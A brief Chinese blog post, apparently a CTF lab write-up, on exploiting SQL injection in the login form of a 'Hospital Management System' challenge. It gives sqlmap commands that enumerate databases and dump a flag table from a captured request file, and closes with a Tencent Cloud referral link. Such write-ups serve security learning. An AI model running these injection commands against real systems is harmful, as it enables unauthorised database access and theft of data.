简介
是一个医院管理系统----Hospital Management System,存在sqli漏洞。
本人使用春秋云境免费靶场在线搭建。
详解
github找到了该漏洞的介绍。注入点在登录框。
- 输入账户密码登录,抓包
- 有三个登录框测试一下,三个都可以。将request保存为sqli.txt文件
- 使用sqlmap注入,命令如下
sqlmap -r sqli.txt --random-agent --risk=3 --level=3 -dbs Bash
- flag在ctf数据库的falg表中
sqlmap -r sqli.txt --random-agent --risk=3 --level=3 -D ctf -T flag --dumpBash
Github点击here
结语
我加入了腾讯云自媒体分享计划,可以获取到腾讯云周边、技术书籍、线下沙龙、云服务器优惠等等。
我的博客即将同步至腾讯云开发者社区,邀请大家一同入驻:https://cloud.tencent.com/developer/support-plan?invite_code=1f93zvim5fqci
